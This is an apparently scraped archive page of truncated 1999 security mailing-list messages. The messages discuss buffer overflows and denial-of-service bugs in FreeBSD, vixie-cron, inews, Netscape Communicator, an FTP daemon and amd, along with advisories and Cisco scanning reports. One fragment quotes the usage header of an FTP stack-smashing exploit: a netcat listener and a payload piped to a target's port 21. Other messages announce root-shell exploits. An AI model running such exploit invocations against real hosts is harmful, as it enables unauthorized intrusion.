Hi there
I'm running version 3.17 firmware on the SSII Hub 10's here, and the
securityUserTable is only visible if you use a read-write community string.
Peter.
- Original Message -
From: Nerijus Krukauskas <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: 30 August 1999 14:43
Subject:
On Fri, 27 Aug 1999, L. Sassaman wrote:
>
> This was first posted to the FreeBSD security list on the 9th of August,
> subsequently discussed on freebsd-stable and freebsd-hackers... no one
> seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x
> machines consistantly. I have
Malicious User <[EMAIL PROTECTED]> writes:
> knock it around. I suspect this version will still fail on FreeBSD
> (anyone care to offer up an account for me on a FreeBSD system to test
Instead of using snprintf() you can you sprintf() and change the
"%s" formats to (e.g.) "$%.30s" - somewhat m
Hi,
Note that user takes the value "user@host" given at password prompt
for anonymous access (forgetting any potential dns attacks into remhost)
This allows anyone to smash the stack just with an anonymous access
and a file to download.
(see last published exploits.)
Regards,
Pascal
On Mon, Aug
Just to keep y'all updated, and to summarize what's
known so far:
1) The ISS advisory sucks (no details, didn't mention
that it was NT-only or that Solaris wasn't vulnerable,
they supposedly worked with Netscape on this, but don't
have more specific info about which platforms/versions
are vulnera
Martin Schulze <[EMAIL PROTECTED]> wrote:
> Red Hat has recently released a Security Advisory (RHSA-1999:030-01)
> covering a reverse denial of service bug in the vixie cron package.
> As user you could restart sendmail even if the host should not receive
> mail through the SMTP port.
>
> Further
Elias sorry if you had this twice...
/*
** code-sky-chocolate: flaoua
** keyboard handler: kalou.
**
** usage: nc -l -p 1509 &
** (./p welcome.msg 195,3,2,83,5,229 -100 1016 ; cat ) | nc host 21
**
** tester avec buf == 1018, 1019, 1020, 1021
** a cause de l'alignement hostname+chemin ~ftp+taille
Message from Michal Zalewski at Jul 5 14:20 in parts:
MZ> For script kiddiez, here's an exploit for recent vixie-cron vulnerability,
MZ> giving instant root shell. Thought it will help script kiddies, but as
MZ> Martin Schulze included almost step-by-step guide how to abuse Sendmail
MZ> flags
[root@sideshow /root]# rpm -q shadow-utils
shadow-utils-980403-12
[root@sideshow /root]# rpm -q pam
pam-0.66-18
Which are standard with 6.0 and I cannot reproduce this problem.
On Mon, 30 Aug 1999 14:07:35 -0700, Prince Ctrl wrote:
>Aleph,
>
>I do not know whether this has been reported to the l
-BEGIN PGP SIGNED MESSAGE-
- -
Red Hat, Inc. Security Advisory
Synopsis: Buffer overflow problem in the inews program
Advisory ID:RHSA-1999:033-01
Issue date: 199
There was a similar problem with SMAP on Gauntlet Firewalls a couple of
years back. Only in that instance, it would eventually fill up the
filesystem with logs, and the proxy service would fail.
blue0ne
-Original Message-
From: Alfred Huger <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED] <[EM
On Tue, 31 Aug 1999 17:13:21 -, Crispin Cowan <[EMAIL PROTECTED]> said:
> Tobias Haustein wrote:
> > I was about to write a
> > binary translator, that reads an executeable, locates every function
> > prolog and epilog, adds the nescessary code to detect buffer
> > overflows, and writes a new
Hi,
I discovered a buffer overflow bug which causes huge security hole on the `Netscape
communicator 4.06J, 4.5J - 4.6J, 4.61e( probably, a version 3.0 after all )'.
The problem of this application is in the handling of EMBED TAG, the buffer overflow
is caused if the long string is specified
plz add this code.
--
: R00t Zer0 - http://www.ugtop.com/defcon0/index.htm :
: E-Mail: [EMAIL PROTECTED] :
: -- -- :
: "HP/UX is the worst OS for the hacker..." - Mark Abene :
n
Travis,
Thanks for the response, we are running 11.2. I would also agree with the
allocation of memory issues that you mention. One other note, it was told
to me yesterday a 2500 series in the same time frame over 5 hops away had
the same problem. Although this router has much less mem (4Meg)
In article <[EMAIL PROTECTED]>,
Norbert Warmuth <[EMAIL PROTECTED]> wrote:
> An off-by-one error, hardly to exploit especially since the value written
> is always '\0'.
Relying on that to protect you may not be prudent. See
http://www.geog.ubc.ca/snag/bugtraq/msg03213.html
for an example of a
I just finished running CyberCop and nmap against a smaller range
(192.168.0.0) on a cat 5500 w/RSM and didn't notice any memory issues on the
RSM. Perhaps it is just the traffic generated by scanning the entire /8 at
once. The Cisco engineer is correct about the small packet issue, though, as
Cis
hi,
i noticed a little while ago this bug redhat has pointed out and wrote a
demonstration exploit..
its a bit lame but it works with no offset on redhat 4.2, 5.0, 5.1, 5.2,
and 6.0.. enjoy! ;)
exploit is attached..
-duke
amdex.tgz
18 matches
Mail list logo